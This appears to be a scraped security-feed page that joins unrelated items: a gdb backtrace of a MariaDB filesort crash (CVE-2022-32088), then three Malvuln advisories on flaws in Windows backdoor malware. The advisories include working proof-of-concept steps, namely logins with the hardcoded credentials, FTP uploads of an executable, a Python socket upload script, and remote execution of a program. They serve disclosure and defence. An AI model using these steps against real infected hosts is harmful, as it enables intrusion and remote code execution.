For help, type "help".

Type "apropos word" to search for commands related to "word"...

Reading symbols from /usr/local/mysql/bin//mysqld...

\[New LWP 639727\]

\[New LWP 586228\]

\[New LWP 629512\]

\[New LWP 630498\]

\[New LWP 586314\]

\[New LWP 643180\]

\[New LWP 629544\]

\[New LWP 586347\]

\[New LWP 586033\]

\[New LWP 630466\]

\[New LWP 630472\]

\[New LWP 630499\]

\[New LWP 630529\]

\[New LWP 639688\]

\[New LWP 586318\]

\[Thread debugging using libthread\_db enabled\]

Using host libthread\_db library "/usr/lib/libthread\_db.so.1".

Core was generated by \`/usr/local/mysql/bin//mysqld --port 10004 --datadir=/home/fuboat/mariadb-tmp/4'.

Program terminated with signal SIGSEGV, Segmentation fault.

#0  0x00007f627b7ba808 in pthread\_kill () from /usr/lib/libpthread.so.0

\[Current thread is 1 (Thread 0x7f625c528240 (LWP 639727))\]

(gdb) (gdb) #0  0x00007f627b7ba808 in pthread\_kill () from /usr/lib/libpthread.so.0

#1  0x000055cd03afd06b in handle\_fatal\_signal (sig=<optimized out>) at /experiment/mariadb-server/sql/signal\_handler.cc:344

#2  <signal handler called>

#3  0x000055cd03af5195 in Exec\_time\_tracker::get\_loops (this=0x0) at /experiment/mariadb-server/sql/sql\_analyze\_stmt.h:89

#4  Filesort\_tracker::report\_use (r\_limit\_arg=18446744073709551615, thd=0x62b0000bd218, this=0x0) at /experiment/mariadb-server/sql/sql\_analyze\_stmt.h:235

#5  filesort (thd=<optimized out>, table=table@entry=0x61f00000fcb8, filesort=filesort@entry=0x629000092dd8, tracker=<optimized out>, join=join@entry=0x62900008a768, first\_table\_bit=<optimized out>) at /experiment/mariadb-server/sql/filesort.cc:267

#6  0x000055cd034dc699 in create\_sort\_index (thd=thd@entry=0x62b0000bd218, join=join@entry=0x62900008a768, tab=tab@entry=0x629000092068, fsort=0x629000092dd8) at /experiment/mariadb-server/sql/sql\_select.cc:24386

#7  0x000055cd03935d79 in Window\_funcs\_sort::exec (this=0x629000092bf0, join=join@entry=0x62900008a768, keep\_filesort\_result=keep\_filesort\_result@entry=false) at /experiment/mariadb-server/sql/sql\_window.cc:3007

#8  0x000055cd03938435 in Window\_funcs\_computation::exec (this=<optimized out>, join=join@entry=0x62900008a768, keep\_last\_filesort\_result=keep\_last\_filesort\_result@entry=false) at /experiment/mariadb-server/sql/sql\_window.cc:3140

#9  0x000055cd0350fc76 in AGGR\_OP::end\_send (this=0x62900008b1f0) at /experiment/mariadb-server/sql/sql\_select.cc:29457

#10 0x000055cd035105d0 in sub\_select\_postjoin\_aggr (join=0x62900008a768, join\_tab=0x629000092068, end\_of\_records=<optimized out>) at /experiment/mariadb-server/sql/sql\_select.cc:20765

#11 0x000055cd0353482c in do\_select (procedure=0x0, join=0x62900008a768) at /experiment/mariadb-server/sql/sql\_select.cc:20604

#12 JOIN::exec\_inner (this=0x62900008a768) at /experiment/mariadb-server/sql/sql\_select.cc:4735

#13 0x000055cd03536593 in JOIN::exec (this=this@entry=0x62900008a768) at /experiment/mariadb-server/sql/sql\_select.cc:4513

#14 0x000055cd0352eb5b in mysql\_select (thd=0x62b0000bd218, tables=tables@entry=0x62b0000c1408, fields=..., conds=conds@entry=0x0, og\_num=1, order=0x629000088f68, group=0x0, having=0x0, proc\_param=0x0, select\_options=<optimized out>, result=0x6290000890a8, unit=0x62b0000c13c0, select\_lex=0x629000088788)

    at /experiment/mariadb-server/sql/sql\_select.cc:4991

#15 0x000055cd0365117f in st\_select\_lex\_unit::exec (this=0x62b0000c13c0) at /experiment/mariadb-server/sql/sql\_union.cc:2360

#16 0x000055cd0365d7b8 in mysql\_union (thd=thd@entry=0x62b0000bd218, lex=lex@entry=0x62b0000c12f8, result=result@entry=0x6290000890a8, unit=unit@entry=0x62b0000c13c0, setup\_tables\_done\_option=<optimized out>) at /experiment/mariadb-server/sql/sql\_union.cc:42

#17 0x000055cd035303a0 in handle\_select (thd=thd@entry=0x62b0000bd218, lex=lex@entry=0x62b0000c12f8, result=result@entry=0x6290000890a8, setup\_tables\_done\_option=setup\_tables\_done\_option@entry=0) at /experiment/mariadb-server/sql/sql\_select.cc:535

#18 0x000055cd03373d7d in execute\_sqlcom\_select (thd=0x62b0000bd218, all\_tables=<optimized out>) at /experiment/mariadb-server/sql/sql\_parse.cc:6256

#19 0x000055cd0339d421 in mysql\_execute\_command (thd=0x62b0000bd218, is\_called\_from\_prepared\_stmt=<optimized out>) at /experiment/mariadb-server/sql/sql\_parse.cc:3946

#20 0x000055cd033a25a1 in mysql\_parse (thd=0x62b0000bd218, rawbuf=<optimized out>, length=<optimized out>, parser\_state=<optimized out>) at /experiment/mariadb-server/sql/sql\_parse.cc:8030

#21 0x000055cd033a860c in dispatch\_command (command=<optimized out>, thd=0x62b0000bd218, packet=<optimized out>, packet\_length=<optimized out>, blocking=<optimized out>) at /experiment/mariadb-server/sql/sql\_parse.cc:1896

#22 0x000055cd033ad73d in do\_command (thd=0x62b0000bd218, blocking=blocking@entry=true) at /experiment/mariadb-server/sql/sql\_parse.cc:1404

#23 0x000055cd03768e57 in do\_handle\_one\_connection (connect=<optimized out>, put\_in\_cache=<optimized out>) at /experiment/mariadb-server/sql/sql\_connect.cc:1418

#24 0x000055cd0376933d in handle\_one\_connection (arg=arg@entry=0x6080000023b8) at /experiment/mariadb-server/sql/sql\_connect.cc:1312

#25 0x000055cd041f9c2c in pfs\_spawn\_thread (arg=0x617000005b98) at /experiment/mariadb-server/storage/perfschema/pfs.cc:2201

#26 0x00007f627b7b3259 in start\_thread () from /usr/lib/libpthread.so.0

#27 0x00007f627b35e5e3 in clone () from /usr/lib/libc.so.6

(gdb) quit

CVE-2022-32088: [MDEV-26419] A SEGV in Exec_time_tracker::get_loops/Filesort_tracker::report_use/filesort

Backdoor.Win32.Coredoor.10.a malware suffers from an authentication bypass vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source: https://malvuln.com/advisory/49da40a2ac819103da9dc5ed10d08ddb.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.Coredoor.10.aVulnerability: Authentication BypassDescription: The malware runs an FTP server on TCP port 21000. Third-party attackers who can reach infected systems can logon using any username/password combination. Intruders may then upload executables using ftp PASV, STOR commands, this can result in remote code execution.Family: CoredoorType: PE32MD5: 49da40a2ac819103da9dc5ed10d08ddbVuln ID: MVID-2022-0618Dropped files: CFS.EXE  Disclosure: 06/29/2022Exploit/PoC:C:\>nc64.exe 192.168.18.125 21000220 c400s FTP Server read...USER malvuln331 Password required for malvuln.PASS malvuln230 User malvuln logged in.SYST215 UNIX Type: L8 Internet Component SuitePASV227 Entering Passive Mode (192,168,18,125,194,224).STOR DOOM.exe150 Opening data connection for DOOM.exe.426 Connection closed; Cannot create file C:\temp\DOOM.exe.CWD \Users250 CWD command successful. "C:/Users/" is current directory.PASV227 Entering Passive Mode (192,168,18,125,195,94).STOR DOOM.exe150 Opening data connection for DOOM.exe.226 File received okfrom socket import *MALWARE_HOST="192.168.18.125"PORT=50014DOOM="DOOM.exe"def doit():    s=socket(AF_INET, SOCK_STREAM)    s.connect((MALWARE_HOST, PORT))    f = open(DOOM, "rb")    EXE = f.read()    s.send(EXE)    while EXE:        s.send(EXE)        EXE=f.read()    s.close()    print("By Malvuln");if __name__=="__main__":    doit()Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Coredoor.10.a MVID-2022-0618 Authentication Bypass

Backdoor.Win32.EvilGoat.b malware suffers from a hardcoded credential vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source: https://malvuln.com/advisory/20daf01e941f966b21a7ae431faefc65.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.EvilGoat.bVulnerability: Weak Hardcoded CredentialsDescription: The malware listens on TCP port 13014. Authentication is required, however the credentials "evilgoat / penix" are weak and found within the PE file.Family: EvilGoatType: PE32MD5: 20daf01e941f966b21a7ae431faefc65Vuln ID: MVID-2022-0619Dropped files: ftpsvr.exeDisclosure: 06/29/2022Exploit/PoC:telnet.exe x.x.x.x 13014220 FTP ServerUSER evilgoat331 Password required for evilgoat.PASS penix230 User evilgoat logged in.SYST500 'SYST': command not understood.PASV227 Entering Passive Mode (192,168,18,125,236,209)CDUP \250 CWD command successful.STOR DOOM.exe150 Opening BINARY mode data connection for file transfer.226 Upload Complete, 25602 bytes sent.from socket import *MALWARE_HOST="192.168.18.125"PORT=60625DOOM="DOOM.exe"def doit():    s=socket(AF_INET, SOCK_STREAM)    s.connect((MALWARE_HOST, PORT))    f = open(DOOM, "rb")    EXE = f.read()    s.send(EXE)    while EXE:        s.send(EXE)        EXE=f.read()    s.close()    print("By Malvuln");if __name__=="__main__":    doit()Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.EvilGoat.b MVID-2022-0619 Hardcoded Credential

Backdoor.Win32.Cafeini.b malware suffers from a hardcoded credential vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source: https://malvuln.com/advisory/a8fc1b3f7a605dc06a319bf0e14ca68b.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.Cafeini.bVulnerability: Weak Hardcoded CredentialsDescription: The malware listens on TCP ports 51966 and 23. Authentication is required, however the password "mama" is weak and found within the PE file. Moreover, the FTP server running on non standard port 23 also uses same password. Trying to execute a program incorrectly you get reply like, "STATUS I can't run program", as it requires the full path to the file to execute.Family: CafeiniType: PE32MD5: a8fc1b3f7a605dc06a319bf0e14ca68bVuln ID: MVID-2022-0617Disclosure: 06/29/2022Exploit/PoC:C:\>nc64.exe x.x.x.x 51966CAFEiNi 1.1Enter your password:mamaC:\Users\victim\Desktop>whoamiwhoamiSTATUS: unknown command "WHOAMI"C:\Users\victim\Desktop>exec c:\Windows\system32\calc.exeexec c:\Windows\system32\calc.exeSTATUS: program runnedC:\Users\victim\Desktop>Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Tag

#redis